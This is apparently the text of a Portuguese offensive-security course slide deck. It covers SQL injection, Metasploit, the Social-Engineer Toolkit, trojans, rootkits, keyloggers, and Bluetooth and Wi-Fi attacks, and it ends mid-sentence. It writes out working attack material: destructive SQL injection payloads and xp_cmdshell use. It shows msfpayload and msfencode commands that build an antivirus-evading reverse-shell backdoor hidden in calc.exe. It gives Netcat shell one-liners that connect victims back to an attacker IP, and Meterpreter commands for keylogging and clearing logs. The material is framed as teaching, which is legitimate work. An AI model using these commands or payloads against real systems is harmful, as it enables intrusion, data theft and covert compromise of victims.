GET /view_account.cfm?acct_id=10 OR 1=1 HTTP/1.1 
 
SELECT * 
FROM accounts 
WHERE acct_id = 28 OR 1=1 -- 
Marcos Flávio Araújo Assunção 
SQL Injection: Exemplo normal 2 
GET /user_lookup.cfm?lastname=assuncao HTTP/1.1 
 
SELECT * 
FROM users 
WHERE lastname = ‘assuncao’ 
Marcos Flávio Araújo Assunção 
SQL Injection: Exemplo injeção 2 
GET /user_lookup.cfm?lastname=assuncao ’;DELETE 
FROM users WHERE 1=‘1 HTTP/1.1 
 
SELECT * 
FROM users 
WHERE lastname = ‘assuncao’;DELETE FROM 
users WHERE 1=‘1’ 
Marcos Flávio Araújo Assunção 
SQL Injection - Dicas 
 acct_id=10 OR 1 = ‘1’ 
 Tente várias cláusulas OR usando <>, >, >=, LIKE, etc. 
 Use comandos para acabar prematuramente com uma 
consulta 
 SELECT * FROM users WHERE user_id = 1-- AND 
password=‘minhasenha’ 
 
 Enumerar informação do banco de dados 
 acct_id=10 UNION SELECT name [,1,2,…] FROM objetos 
WHERE xtype=‘U’ 
 acct_id=10 UNION SELECT [colunas] FROM [tabela] 
 
 UNION requer que ambos os pedidos compartilhem um 
número comum de colunas, acrescentando colunas quando 
requerido 
Marcos Flávio Araújo Assunção 
SQL Injection – Automatização 
 Alguns softwares de vulnerabilidade permitem detectar 
erros de SQL automaticamente. Alguns exemplos: 
 Nessus 
 SQLFinder 
 Acunetix WVS 
 
 Existem até alguns programas que podem explorar 
automaticamente o SQL Injection, automatizando o 
processo. Exemplos: 
 Havij 
 SQL Ninja 
 Fast-Track 
 Metasploit 
Marcos Flávio Araújo Assunção 
Exemplo: Havij (SQL Injection GET) 
Marcos Flávio Araújo Assunção 
Exemplo: Havij (Online Crack MD5) 
Marcos Flávio Araújo Assunção 
SQL Injection: Indo além 
 Concatene múltiplos comandos 
 acct_id=28; DROP TABLE Users; 
 Procedimentos úteis 
 xp_msver 
 xp_cmdshell [command] -> PERIGO! 
 xp_servicecontrol [action] [service] 
Marcos Flávio Araújo Assunção 
Exemplo xp_cmdshell 
Marcos Flávio Araújo Assunção 
Exemplo xp_cmdshell 
Marcos Flávio Araújo Assunção 
Considerações sobre o SQL Server 
 O SQL Server vem por padrão com o usuário 
‘sa’ (system administrator). 
 
 Muitos administradores não colocam senhas 
muito complexas para este usuário 
 
 O BackTrack possui várias ferramentas para 
tentar fazer força bruta na conta sa e, caso a 
senha seja descoberta, pode-se executar o 
xp_cmdshell sem precisar de SQL Injection. 
Marcos Flávio Araújo Assunção 
Vulnerabilidades de Software 
– Exploração de falhas 
Marcos Flávio Araújo Assunção 
Objetivos da exploração de falhas 
 Falhas remotas – Ganhar acesso não autorizado 
ao sistema alvo (normalmente ao shell) ou 
causar Denial of Service 
 Falhas locais – Elevar os privilégios de acesso 
para root/system ou causar Denial of Service 
 
 Normalmente um atacante irá explorar uma 
falha remota para invadir um sistema e loco 
depois tentará a elevação de privilégios. O 
motivo para isto é que a maioria dos serviços 
hoje rodam no perfil de usuários com poucos 
privilégios como o nobody/guest. 
Marcos Flávio Araújo Assunção 
Tipos de falhas 
 Stack 
overflow 
 Heap 
overflow 
 Heap 
Spraying 
 Memory 
Corruption 
 String format 
 Race 
conditions 
 Privilege 
Escalation 
Marcos Flávio Araújo Assunção 
Pesquisa manual por Falhas - SecurityFocus 
Marcos Flávio Araújo Assunção 
Scanners “genéricos” de 
vulnerabilidades 
Não se focam em um 
serviço específico. 
 
São como um médico 
generalista, detectam 
“superficialmente” 
problemas em vários 
protocolos. 
 
Exemplos de 
softwares: Nessus, 
Retina, Languard, 
Shadow Security 
Scanner 
 
Boa opção para uma 
grande rede 
corporativa 
Marcos Flávio Araújo Assunção 
Scanners “especialistas” de 
vulnerabilidades 
Focam em poucos 
protocolos e serviços 
(normalmente apenas 
um), por isso fazem 
uma análise mais 
apurada. 
 
Há muitos scanners 
destes para http, sql, 
etc. 
 
 
Exemplos de 
softwares: Nikto, 
SQLMap, SQL Ninja, 
Acunetix, W3AF, etc. 
Marcos Flávio Araújo Assunção 
Descobrindo novas falhas – Zero Day 
 Debugger / 
dissambler 
 Fuzzing 
 Registradores 
 ESP (Stack 
Pointer) 
 EBP (Base 
ponter) 
 EIP (Instruction 
pointer) 
 Breakpoints 
 NOP Slide 
 Payload 
 Exploit 
Marcos Flávio Araújo Assunção 
Metasploit Framework 
• Criado por HD Moore, é hoje o framework de 
exploração de falhas mais utilizado. 
 
• Extremamente customizável 
• Atualizações frequentes 
• Possibilidade de criação de scripts 
• Muitas opções de payloads 
• Métodos para se burlar firewalls e anti-vírus 
• Meterpreter 
• Interface console, gui e web 
Marcos Flávio Araújo Assunção 
MetaSploit Framework 
•Framework de 
testes 
• Objetivo 
• Metodologia 
blackbox 
• Explora Bugs 
através de 
exploits 
Ex: Buffer 
Overflows 
Marcos Flávio Araújo Assunção 
Metasploit Framework 
 Selecionar 
exploit 
 Selecionar 
alvo 
 Selecionar 
Payload 
 Aguardar 
resultado 
 Acessar 
shell 
remoto 
Marcos Flávio Araújo Assunção 
Metasploit – Suíte completa 
O Metasploit Framework (MSF) vem com muitos 
utilitários para auxiliar na realização da 
exploração. Vamos estudar os principais: 
msfconsole, msfcli, msfpayload e msfencode. 
Marcos Flávio Araújo Assunção 
Variáveis do Metasploit 
São usadas em todos os comandos do 
MSF. Ex: msfconsole, msfcli, msfpayload, 
etc. As principais são: 
 
• LHOST -> IP local 
• LPORT -> Porta local 
• RHOST -> IP remoto 
• PAYLOAD -> Tipo de payload 
• TARGET -> Tipo de alvo 
Marcos Flávio Araújo Assunção 
Msfconsole 
Método mais utilizado para uso do MSF. É 
um console que permite escolher 
interativamente exploits, utilitários, 
payloads e configurar as devidas variáveis. 
Marcos Flávio Araújo Assunção 
Comandos do MSFCONSOLE 
• search <nome> -> Pesquisa módulo de exploit 
• use <nome> -> Utiliza módulo de exploit 
• show <argumento> -> Mostra informações 
referentes ao módulo. O argumento pode ser: 
exploits, options, payloads ou auxiliares. 
• set <variável> -> Configura um valor em uma 
variável. Ex: LHOST, LPORT, PAYLOAD, etc. 
• unset <variável> -> “Desconfigura” uma 
variável. 
• exploit -> Realiza a exploração após as 
variáveis terem sido configuradas. 
Marcos Flávio Araújo Assunção 
MSFConsole – Exemplo search 
search ms12 
Marcos Flávio Araújo Assunção 
MSFConsole – Exemplo use 
use exploit/windows/smb/ms08_06_netapi 
Marcos Flávio Araújo Assunção 
MSFConsole – Exemplo show 
show payloads 
Marcos Flávio Araújo Assunção 
MSFConsole – Exemplo set 
set LHOST 192.168.10.1 
set LPORT 443 
set RHOST 192.168.10.2 
Marcos Flávio Araújo Assunção 
MSFConsole – set payload e show options 
set PAYLOAD 
windows/meterpreter/reverse_tcp 
show options 
Marcos Flávio Araújo Assunção 
MSFConsole - Exploit 
Depois de todas as variáveis já 
devidamente configuradas para 
executar o comando exploit para 
realizar a exploração 
Marcos Flávio Araújo Assunção 
 Meterpreter 
Marcos Flávio Araújo Assunção 
Meterpreter 
O MSF trabalha com vários tipos de payloads, mas o 
melhor de todos é o meterpreter. Algumas 
características dele: 
 
• Roda diretamente na memória RAM, sem uso do 
disco. 
• Permite a execução de diversas tarefas como (shell, 
download e upload de arquivos, keylogger, sniffer, 
screenshot,RDP, etc). 
• Permite migrar o processo para outro executável e 
inicializar com o sistema 
• Permite limpar os rastros nos logs e finalizar anti-vírus 
• Permite elevar os privilégios de usuário 
Marcos Flávio Araújo Assunção 
Alguns comandos do Meterpreter 
• ps -> Lista processos em execução 
• shell -> Acessa o prompt de comandos 
• clearev -> Limpa os logs. 
• run vnc -> Instala o VNC remotamente. 
• getsystem -> Obtém o usuário system. 
• keyscan_start -> Inicia o keylogger. 
• migrate -> Migra para outro processo. 
• run migrate -> Migra automaticamente 
• screenshot -> Tira um screenshot da tela 
• download -> Faz download de um arquivo 
Marcos Flávio Araújo Assunção 
Meterpreter – Exemplo ps 
Marcos Flávio Araújo Assunção 
Meterpreter – Exemplo migrate 
Marcos Flávio Araújo Assunção 
Meterpreter – Exemplos pwd e ls 
pwd -> Mostra diretório atual 
ls -> Lista arquivos/diretórios 
Marcos Flávio Araújo Assunção 
Meterpreter – Download e Upload 
Sintaxe: 
 
download <arquivo> <local> 
upload <arquivo> <local> 
Marcos Flávio Araújo Assunção 
Meterpreter – Listando Tokens 
Marcos Flávio Araújo Assunção 
Meterpreter 
Ex: getsystem, clearev e screenshot 
Marcos Flávio Araújo Assunção 
Meterpreter 
keyscan_start e sniffer_start 
Observação: keyscan_stop e 
sniffer_stop encerram as atividades. 
keyscan_dump obtém o arquivo com 
as teclas digitadas. 
Marcos Flávio Araújo Assunção 
Meterpreter – Exemplo shell 
Marcos Flávio Araújo Assunção 
Msfcli 
Marcos Flávio Araújo Assunção 
Msfcli 
O msfcli permite fazer tudo o que o msfconsole faz 
mas diretamente do shell, em uma única linha de 
comando. É muito prático quando usado em scripts. 
 
Sintaxe: 
 
msfcli <módulo> <payload> <variáveis> <modo> 
 
Em modo normalmente utilizando a opção E para 
permitir a execução imediata do exploit. 
 
 
Marcos Flávio Araújo Assunção 
Msfcli – Exemplo real 
msfcli exploit/windows/smb/ms08_067_netapi 
PAYLOAD=windows/meterpreter/reverse_tcp 
RHOST=192.168.10.2 LHOST=192.168.10.1 LPORT=443 E 
No exemplo acima estamos executando o msfcli contra o host 
remoto (RHOST) 192.168.10.2 configurando como PAYLOAD o 
meterpreter de conexão reversa e dizendo que ele deve se 
conectar de volta no ip 192.168.10.1 (LHOST) na porta 443 
(LPORT). 
Marcos Flávio Araújo Assunção 
Msfpayload 
Marcos Flávio Araújo Assunção 
Msfpayload 
Permite converter qualquer um dos payloads do 
metasploit para um arquivo puro(raw) ou mesmo um 
executável. Isso permite que você possa utilizar o 
payload como um backdoor comum. 
 
Sintaxe: 
 
msfpayload <payload> <variáveis> <modo> 
 
Em modo normalmente utilizando a opção X para 
permitir que o payload executável seja criado. 
 
 
Marcos Flávio Araújo Assunção 
Msfpayload 
msfpayload windows/meterpreter/reverse_tcp 
LHOST=192.168.10.1 LPORT=443 X > backdoor.exe 
No exemplo acima estamos gerando o executável backdoor.exe 
ao rodar o msfpayload como PAYLOAD do meterpreter de 
conexão reversa e dizendo que ele deve se conectar de volta no 
ip 192.168.10.1 (LHOST) na porta 443 (LPORT). 
 
Se for um payload de conexão reversa é necessário um Multi-
Handler no MSFConsole ou MSFCli para receber a conexão de 
volta. No próximo slide veremos como criar um. 
Marcos Flávio Araújo Assunção 
Multi-Handler: Msfconsole x Msfcli 
Marcos Flávio Araújo Assunção 
Msfencode 
Marcos Flávio Araújo Assunção 
Msfencode 
Permite codificar qualquer um dos payloads em arquivo 
puro(raw) gerados pelo msfpayload. O objetivo é fazer com que 
assim o payload não seja detectado por anti-vírus e ferramentas 
de IDS. Sintaxe: 
 
msfencode –i <arq> -e <encoder> -c <vezes> -t <modo> 
-o <arq> 
 
Opções mais comuns: 
 
-i -> arquivo de entrada 
-e -> tipo de encoder. Ex: x86/shikata_ga_nai 
-c -> vezes que o encoder irá codificar. 
-t -> tipo de arquivo gerado. Normalmente é exe. 
-o -> arquivo de saída 
-x -> executável para ser usado como base 
-k -> Permite execução paralela (usado com o –x). Marcos Flávio Araújo Assunção 
Msfencode – Uso com arquivo raw 
msfencode -t exe –i backdoor.raw -o backdoor.exe -e 
x86/shikata_ga_nai -c 5 
Marcos Flávio Araújo Assunção 
Msfpayload + Msfencode (única 
linha) 
msfpayload windows/meterpreter/reverse_tcp 
LHOST=192.168.10.1 LPORT=443 R > msfencode –x calc.exe -k 
-o calcmalvada.exe -e x86/shikata_ga_nai -c 7 –t exe 
 
Marcos Flávio Araújo Assunção 
Fast-Track 
Marcos Flávio Araújo Assunção 
Fast-Track 
 Foi criado como um complemento para o Metasploit. 
Permite automatizar exploração (autopwn), realizar 
ataques ao lado cliente, executar SQL injection e diversas 
outras tarefas. Possui um modo gráfico e console. 
Utilizaremos somente o segundo modo. Para acessá-lo 
basta digitar ./fast-track.py -i 
 
Marcos Flávio Araújo Assunção 
Fast-Track – Menu principal 
Marcos Flávio Araújo Assunção 
Fast-Track - Atualização 
Marcos Flávio Araújo Assunção 
Fast-Track - Autopwn 
 A opção autopwn seleciona automaticamente diversos 
tipos de exploits e os utiliza contra o alvo, aumentando a 
chance da exploração ser bem sucedida. Entretanto, o 
autopwn é mais fácil de detectar por um sistema de IDS. 
 
Marcos Flávio Araújo Assunção 
Fast-Track – NMAP Engine 
Marcos Flávio Araújo Assunção 
Fast-Track SQL Inject 
Marcos Flávio Araújo Assunção 
Fast-Track – SQL Inject 
Marcos Flávio Araújo Assunção 
Fast-Track Mass Client Attack 
Marcos Flávio Araújo Assunção 
Fast-Track – Exploits diversos 
Marcos Flávio Araújo Assunção 
Fast-Track Binary to Hex 
Marcos Flávio Araújo Assunção 
Fast-Track – Payload Generator 
Marcos Flávio Araújo Assunção 
SET (Social 
Engineering Tool) 
Marcos Flávio Araújo Assunção 
SET 
 Também foi criado como um complemento para o 
Metasploit. Consegue criar modelos falsos de 
websites, enviar e-mail em massa, criar phishing, 
gerar documentos com falhas, criar um ataque 
Wireless e muito mais. 
 
 Para iniciar acesse o diretório /pentest/exploits/set e 
digite o comando: 
 ./set 
 
Marcos Flávio Araújo Assunção 
SET – Menu principal 
Marcos Flávio Araújo Assunção 
SET – Menu Engenharia Social 
Marcos Flávio Araújo Assunção 
SET – Spear Phishing 
Marcos Flávio Araújo Assunção 
SET – Mass E-mailer 
Marcos Flávio Araújo Assunção 
SET - WebAttack 
Marcos Flávio Araújo Assunção 
SET – Ataque autorun USB/CD 
Marcos Flávio Araújo Assunção 
SET – Create payload and listener 
Marcos Flávio Araújo Assunção 
SET – Java Applet Attack 
Marcos Flávio Araújo Assunção 
SET – Ataques equipamentos Arduino 
Marcos Flávio Araújo Assunção 
SET – Wireless Fake AP Attack 
Marcos Flávio Araújo Assunção 
Vulnerabilidades de Malware 
Marcos Flávio Araújo Assunção 
Definição 
 Malicious Software 
 Origem 
 Objetivos 
 Malwares passivos 
 Malwares ativos 
 Risco 
Marcos Flávio Araújo Assunção 
Métodos de Infecção dos 
Malwares 
Marcos Flávio Araújo Assunção 
E-mail 
 Simples 
 Rápido 
 Confiável 
 Contatos 
 Fake mail 
 Phishing 
Marcos Flávio Araújo Assunção 
Messengers 
 MSN 
 ICQ 
 GoogleTalk 
 Confiabilidade 
 Menor desconfiança 
 Eficiência 
Marcos Flávio Araújo Assunção 
Código móvel 
 ActiveX 
 Javascript 
 VBScript 
 Sites maliciosos 
 Navegador 
desatualizado 
Marcos Flávio Araújo Assunção 
Falhas 
 Buffer overflows Elevação de 
privilégios 
 SQL Injection 
 XSS 
Marcos Flávio Araújo Assunção 
Mídia de armazenamento 
 CD 
 DVD 
 Pen-Drive 
 Autorun 
 Curiosidade 
 Menor 
desconfiança 
Marcos Flávio Araújo Assunção 
Métodos de Ocultamento 
Marcos Flávio Araújo Assunção 
Binders 
 Juntar programas 
 Jogo + backdoor 
 Execução 
programada 
 Alteração do 
registro 
 Senna Spy 
 Wordpad 
Marcos Flávio Araújo Assunção 
Steganografia 
 Método eficiente 
 Burla proteções 
 Imagens 
 MP3 
 Binários 
 Espaçamento 
Marcos Flávio Araújo Assunção 
Edição/remoção de recursos binários 
 Permite 
“mudar” a 
estrutura 
binária de um 
malware, 
dificultando 
detecção por 
AVs 
Marcos Flávio Araújo Assunção 
Edição hexadecimal 
 Permite 
“mudar” certas 
strings em um 
software, 
tentando com 
isto dificultar a 
detecção por 
AVs 
Marcos Flávio Araújo Assunção 
Ocultamento do Firewall 
 Proteção “cara-crachá” 
 Filtro de pacotes 
- Spoofing 
- Porta de origem 
- Conexão reversa 
 Sandbox 
- DLL injection 
 Personal Firewall 
killing (processo) 
 Tunneling 
- HTTP (proxy) 
- ICMP (ping) 
- DNS 
 
Marcos Flávio Araújo Assunção 
Ocultamento do IDS 
 Assinatura 
 Comportamento 
 Fragmentação 
 Tunelamento 
 Criptografia 
 
Marcos Flávio Araújo Assunção 
Ocultamento do Anti-Virus 
 Assinatura 
 Edição recursos 
 Editor Hexa 
 Compressão 
do executável 
 Polimorfismo de 
código 
Marcos Flávio Araújo Assunção 
Alternate Data Streams 
 Permite criar “camadas” de 
dados adicionais em 
sistemas NTFS 
 Exemplo: texto.txt:virus.exe 
 Pode ser aberto com o 
comando start. Ex: 
 
start c:\teste\texto.txt:oculto.txt 
 
Marcos Flávio Araújo Assunção 
Backdoors 
Marcos Flávio Araújo Assunção 
Definição 
 Porta dos 
fundos 
 Easter Egg 
 Senhas 
 Modificação 
de serviços 
originais 
 Criação de 
novo serviço 
Marcos Flávio Araújo Assunção 
NetCat 
 Muito 
conhecido 
 Canivete Suiço 
 CryptoCat 
 Cliente 
 Serviço local 
 Conexão 
reversa 
 
Marcos Flávio Araújo Assunção 
Netcat – Conexão direta 
Este método é relativamente o mais simples, mas também o mais 
facilmente detectado e impedido. O atacante já precisa possuir acesso 
prévio ao sistema que deseja infectar. Ele então roda o Netcat no sistema 
alvo, abrindo uma porta TCP e anexando um processo de shell a ela. 
 
O seguinte comando por exemplo funcionaria em sistemas Windows: 
 
nc –L –p 100 –e cmd.exe –vv 
 
A opção –d poderia ser utilizada para “esconder” o processo da 
console. 
 
Basta agora o atacante se conectar via telnet ou nc na porta 100 do 
sistema infectado. 
 
 
 
Marcos Flávio Araújo Assunção 
Netcat – Conexão direta 
Marcos Flávio Araújo Assunção 
Netcat – Conexão reversa 
•Nesse método o “atacante” será o servidor. O cliente inicia a conexão. 
 
• Ele deverá abrir duas portas com o Netcat, usando quaisquer números. 
Tudo o que for digitado pelo cliente na primeira porta, será processado pelo 
shell através do pipe e mostrado como resultado na segunda porta. 
 
• Usando engenharia social ou outro método, força-se o cliente a se 
conectar às duas portas com telnet (ou o próprio NetCat, mais 
recomendado no caso do Windows) 
 
• Exemplo: 
 
Vamos supor que abri as portas 79 e 53, ambas TCP, no meu sistema. 
Meu endereço IP é 20.0.0.1 e agora preciso que a “vítima” digite os 
comandos para se conectar em mim. Exemplo: 
 
telnet 20.0.0.1 79 | /bin/sh | telnet 20.0.0.1 53 (para sistemas Linux-like) 
 
Nc 20.0.0.1 79 | cmd.exe | telnet 20.0.0.1 53 (para sistemas Windows) 
Marcos Flávio Araújo Assunção 
Netcat – Conexão reversa 
Marcos Flávio Araújo Assunção 
Tunelamento ICMP - Loki 
 Tunelamento ICMP 
 ICMP_ECHO 
 ICMP_ECHOREPLY 
 Loki 
 Lokid 
 
 
Marcos Flávio Araújo Assunção 
Tunelamento ICMP - ICMPCMD 
 Proof of 
concept 
 Sistemas 
Windows 
 Usa apenas 
o “ping” para 
se comunicar 
 
 
Marcos Flávio Araújo Assunção 
Tunelamento HTTP - Reverse WWW 
Backdoor 
 The Hackers 
Choice 
 “Placing 
Backdoors 
througt Firewalls” 
 Proof of Concept 
 Tunelamento 
 HTTP 
 Proxy 
Marcos Flávio Araújo Assunção 
Cavalos de Tróia 
Marcos Flávio Araújo Assunção 
Definição 
 Objetivo 
 Tróia 
 Binders 
 Windows 
 Primeira geração 
 Segunda geração 
 Terceira geração 
Marcos Flávio Araújo Assunção 
Back Orifice 
 Cult of dead cow 
 1997 
 Primeira geração 
 Windows 9x 
 Conexão comum 
 Sem opção de 
alerta 
 Plug-ins 
Marcos Flávio Araújo Assunção 
Netbus 
 Carl Frederik 
 1998 
 Primeira geração 
 Windows 9x e NT 
 Conexão comum 
 Alerta por e-mail 
 Sem plug-ins 
Marcos Flávio Araújo Assunção 
SubSeven 2.1 
 2000 
 Segunda geração 
 Windows 9x e NT 
 Conexão comum 
 Alerta por e-mail, 
ICQ e IRC 
 Plug-ins 
 Scanner remoto 
 
Marcos Flávio Araújo Assunção 
Beast 
 2003 
 Terceira Geração 
 Conexão comum e 
reversa 
 Keylogger 
 Screenlogger 
 DLL Injection 
 Firewall killing 
Marcos Flávio Araújo Assunção 
Beast realizando conexão reversa 
Marcos Flávio Araújo Assunção 
Poison Ivy 
 2005 
 Terceira 
 Geração 
 Conexão 
comum e 
reversa 
 Tunelament
o 
 Criptografia 
 Webcam 
 Farejamento 
remoto Marcos Flávio Araújo Assunção 
Dark Comet 
 2010 
 Quarta geração 
 Possui várias 
novidades 
como: 
 
- Suporte a dns 
dinâmico (no ip) 
- Diferentes 
tipos de 
tunelamento 
- Cliente/server 
FTP 
- Novos 
métodos de 
ocultamento do 
server 
- Etc 
Marcos Flávio Araújo Assunção 
Rootkits 
Marcos Flávio Araújo Assunção 
Definição 
 “Kit do root” 
 Propagação 
 Esconde 
informações vitais 
 Nível de Aplicação 
 Nível de Biblioteca 
 Nível de Kernel 
 Nível de 
Virtualização 
Marcos Flávio Araújo Assunção 
Hacker Defender 
 2002 
 HxDef 
 Morphine 
 Baseado em 
kernel 
 Arquivos 
 Processos 
 Pastas 
 Conexões 
Marcos Flávio Araújo Assunção 
AFX Rootkit 
 2005 
 APIs do Windows 
 Baseado em 
biblioteca 
 Processos 
 Serviços 
 Conexões 
 Ícones 
 Arquivos 
Marcos Flávio Araújo Assunção 
Zero Access Rootkit 
 2011 
 Kernel mode 
rootkit 
 Infecta sistemas 
de 32 e 64 bits 
 Usa falhas web 
(browser, java, 
flash) como 
principal método 
de propagação 
 
Marcos Flávio Araújo Assunção 
Keyloggers 
Marcos Flávio Araújo Assunção 
Definição de Keylogger 
 Captura do 
teclado 
 Interrupção 
 Mensagens 
 Keyloggers 
locais 
 Keyloggers com 
envio remoto 
 Keyloggers 
físicos 
Marcos Flávio Araújo Assunção 
Home Keylogger 
 Local 
 Simples 
 Fácil utilização 
 Não é detectado 
 Grava em um 
arquivo de texto 
comum 
Marcos Flávio Araújo Assunção 
Spy Lantern Keylogger 
 Remoto 
 Comercial 
 Detectado 
 Criptografia 
 E-mail 
Marcos Flávio Araújo Assunção 
Keylogger físico 
 Necessita 
acesso Físico 
 Versões PS2 
e USB 
 Senha para 
acesso ao 
conteúdo 
 Versão com 
suporte a wi-fi 
Marcos Flávio Araújo Assunção 
Screenloggers 
Marcos Flávio Araújo Assunção 
Definição 
 Screenshots 
 Visual 
 Remoto 
 Ideal para captura 
de teclados 
virtuais 
 Muito utilizado emvírus do tipo 
“Banker” 
Marcos Flávio Araújo Assunção 
Perfect Keylogger 
 BlazingTools 
 Comercial 
 Grava shots 
no disco 
 Envia shots 
por e-mail 
 Instalação 
remota 
Marcos Flávio Araújo Assunção 
Ardamax Keylogger 
 Comercial 
 WebUpdate 
 E-mail 
 LAN 
 FTP 
Marcos Flávio Araújo Assunção 
 
Vulnerabilidades de 
BlueTooth 
 
 
Marcos Flávio Araújo Assunção 
Ataques a Bluetooth 
 War-Snipping 
 BlueJacking 
 BlueSnarfing 
 BlueBugging 
 BlueSniper 
 Denial of Service 
 
Marcos Flávio Araújo Assunção 
War-Snipping 
 Para descobrir 
dispositivos 
 Envia dados 
aleatórios(lixo) 
visando uma resposta 
qualquer do 
dispositivo 
 Permite detectar a 
maior parte dos 
dispositivos 
conhecidos 
Marcos Flávio Araújo Assunção 
BlueJacking 
 Também chamado de 
BlueSpamming 
 Envia um VCard para 
outro dispositivo 
 No campo de 
identificação do nome, 
substitui pela 
mensagem 
 Usado para BlueDating 
e BlueChat 
 
Marcos Flávio Araújo Assunção 
BlueSnarfing 
 Roubo de 
informações do 
dispositivo 
 Contatos, 
calendário 
 Calendário 
 Problemas no 
protocolo OBEX 
(get invés de push 
vcard) 
 Dispositivos mais 
antigos 
Marcos Flávio Araújo Assunção 
BlueBugging 
 Permite acesso a 
comandos do celular 
 Mais poderoso que o 
BlueSnarfing 
 Permite fazer 
chamadas, enviar 
SMS e até ouvir 
conversas alheias. 
 Geralmente utiliza um 
laptop 
Marcos Flávio Araújo Assunção 
BlueSniper 
O BlueTooth é realmente limitado a uma comunicação de 100 metros? 
Marcos Flávio Araújo Assunção 
BlueSniper 
Marcos Flávio Araújo Assunção 
BlueSniper 
Permite encontrar dispositivos Bluetooth a 1 Km de distância! 
Marcos Flávio Araújo Assunção 
 
Vulnerabilidades de Wi-Fi 
 
 
Marcos Flávio Araújo Assunção 
Redes 802.11 (Wi-Fi) 
• Princípios 
• Frequências: 
2.4GHz / 5 GHz 
• Canais e interferência 
• ESSID e BSSID 
• DS (Sistema de 
Distribuição) 
• IBSS ou AD-HOC 
• BSS 
• ESS 
Marcos Flávio Araújo Assunção 
BSS (Basic Service) 
• Associação 
“Conectar-se” ao Access Point 
 
• Autenticação 
OSA (Open System 
Authentication) 
SKA (Shared Key – WEP) 
PSK (WPA Personal - Pre-Shared 
Key) 
802.1X (WPA Enterprise – Radius) 
Marcos Flávio Araújo Assunção 
ESS (Extended Service) 
• Desassociação 
“Desconectar-se” de um AP e “reconectar” em outro em um ESS. 
 Iniciado normalmente pela estação. 
• Desautenticação 
Desautenticar uma estação wi-fi. Automaticamente ela também é 
desassociada. Iniciado pelo AP. 
Marcos Flávio Araújo Assunção 
Elementos de Segurança Wi-Fi 
• Criptografia 
WEP, WEP2, WEP Dinâmico 
WPA, WPA2 
 
• Autenticação 
OSA, Shared Key (WEP), 
WPA-PSK, WPA-Enterprise (802.1X) 
 
• Rede invisível (ESSID oculto) 
 
• Filtro de endereços MAC 
 
• WIDS / WIPS (Wireless Intrusion 
Prevention System). 
 
• Outros (VLAN, proteção contra ARP 
no AP, etc). 
Marcos Flávio Araújo Assunção 
Ataques à redes Wireless 
 Ataques à Infra-estrutura: 
Negação de Serviço (DoS) 
Burlando filtros de MAC 
WarDriving (detecção passiva/ativa) 
 Ataques de criptoanálise/força-bruta: 
Decriptação de IVS no WEP (Wep Cracking) 
Bruteforce em handhshakes WPA 
 Ataques ao usuário Wi-Fi: 
Rogue Access Point 
Evil Twin 
Ataque MITM com DNS Spoofing 
 
 
 
 
 
 Marcos Flávio Araújo Assunção 
WarDriving – Detectando e 
mapeando redes Wi-Fi 
Marcos Flávio Araújo Assunção 
Wardriving 
 Mapeamento de redes wireless 
 Usado como método de descoberta passiva de 
redes 
 Tecnicamento envolve o uso de um 
automóvel para gravar informações 
wireless sobre uma larga àrea 
 Warflying utilizam aviões ao invés de 
automóveis 
 Wardriving em si não é uma atividade 
ilegal 
 Usar o sinal de rádio para se conectar a 
redes sem a permissão do dono é ilegal 
Marcos Flávio Araújo Assunção 
Hardware para o wardriving 
Marcos Flávio Araújo Assunção 
Hardware para o Wardriving 
 Computadores móveis 
 Notebook/tablets 
 Smartphones 
 Interface de rede Wireless 
 Possui diversas formas e estilos 
 Formato USB 
 Placa PCI 
 Placa PCMCIA 
 Cartão CompactFlash (CF) 
 
Marcos Flávio Araújo Assunção 
Hardware para o wardriving 
 Antenas 
 Anexando uma antena externa irá aumentar 
muito o alcance da descoberta das redes 
wireless 
 Características fundamentais 
 Se a frequência aumenta o comprimento de onda 
diminui. 
 Se o ganho da antena aumenta a àrea de cobertura 
diminui 
Marcos Flávio Araújo Assunção 
Hardware para o wardriving 
 Antenas (continuação) 
 Categorias básicas 
Omni-direcional 
• Detecta igualmente sinais de todas as direções 
Semi-direcional 
• Foca em uma direção específica 
Direcional 
• Envia o sinal em uma direção bem definida 
(ângulo bem fechado) 
 
 
 
Marcos Flávio Araújo Assunção 
Hardware para o wardriving 
Marcos Flávio Araújo Assunção 
 Antena e NIC sugeridos 
 Antena e NIC de 58dbi e 8000mw 
 Modelo: EDUP EP-MS8515GS 
Chipset: Ralink 3070L e Realtek 187L 
Alcance do sinal: + de 5 KM 
 
Marcos Flávio Araújo Assunção 
Hardware para o wardriving 
Marcos Flávio Araújo Assunção 
Hardware para o wardriving 
Marcos Flávio Araújo Assunção 
Softwares para o wardriving 
 Aplicações open-source 
 Kismet 
 Roda em sistemas Linux (existe porte para Windows) 
 Pode reportar dados similares ao NetStumbler 
 Também suporta GPS 
 Pode capturar pacotes e salvá-los em um arquivo 
 airodump-ng 
 Possui quase todos os recursos do Kismet (menos o 
GPS). Permite integração com outras ferramentas da 
suíte NG. 
 
 Marcos Flávio Araújo Assunção 
WarDriving - Kismet 
Marcos Flávio Araújo Assunção 
WarDriving – airodump-ng 
Marcos Flávio Araújo Assunção 
Denial of Service (Recusa de 
serviço) em redes Wi-Fi 
Marcos Flávio Araújo Assunção 
Ataques Denial of Service (DoS) 
 Ataques DoS no Wireless 
 Negam o acesso de dispositivos wi-fi ao AP 
 Categorias 
 Ataques da camada física 
 Ataques da camada de enlace (MAC) 
 Ataques da camada física 
 Inunda o espectro com interferência 
eletromagnética 
 Para prevenir ao dispositivo de se comunicar com o 
AP 
Marcos Flávio Araújo Assunção 
DoS Camada física 
Marcos Flávio Araújo Assunção 
DoS Camada de Enlace (MAC) 
Marcos Flávio Araújo Assunção 
Filtro de MAC e Redes ocultas 
Marcos Flávio Araújo Assunção 
Aplicando Filtro de MAC 
Marcos Flávio Araújo Assunção 
Trocando o MAC da estação 
Marcos Flávio Araújo Assunção 
Filtro de MAC “burlado” 
Marcos Flávio Araújo Assunção 
Ocultando uma rede para protegê-la 
Marcos Flávio Araújo Assunção 
Detectando redes ocultas 
Mesmo que uma rede esteja oculta podemos detectar sua 
presença ao monitorar os probes dos dispositivos clientes 
no Wireshark. Isso só é possível no modo de monitoração 
com a interface mon0. 
O que é exatamente este “Modo de 
Monitoração”? 
Marcos Flávio Araújo Assunção 
Modo de Monitoração 
Neste modo (RFMON) podemos monitorar o 
tráfego das redes wi-fi sem precisarmos nos 
associar à elas. Utilitário: airmon-ng 
Marcos Flávio Araújo Assunção 
Descobrindo APs e estações com Airodump 
 Permite monitorar redes wireless e capturar pacotes para serem 
analisados posteriormente. Consegue detectar Access Points em 
qualquer canal, mesmo estando “invisíveis”. Detecta também 
